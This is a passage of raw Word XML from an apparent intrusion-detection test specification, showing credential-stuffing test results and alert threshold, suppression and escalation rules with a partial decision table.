              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.21.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No stuffing detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password pass1234 with 3 user names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.21.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREDENTIAL_STUFFING MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREDENTIAL_STUFFING MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9049" w:name="_Toc69049"/>
      <w:r>
        <w:t xml:space="preserve">Alert Notification (Threshold, De-duplication, Escalation)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9049"/>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A detection is notified only if its severity reaches the minimum for its type in alerts.yaml (default HIGH; MULTI_PROTOCOL_ATTACK requires CRITICAL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After an alert for an IP, further detections for the same IP within 10 minutes are recorded as suppressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A detection with a higher severity than the last alert inside the window is sent once as an ESCALATION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">28</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Decision Table for Alert Notification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BE67570" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity ≥ minimum for the type?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alert for this IP in last 10 min?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
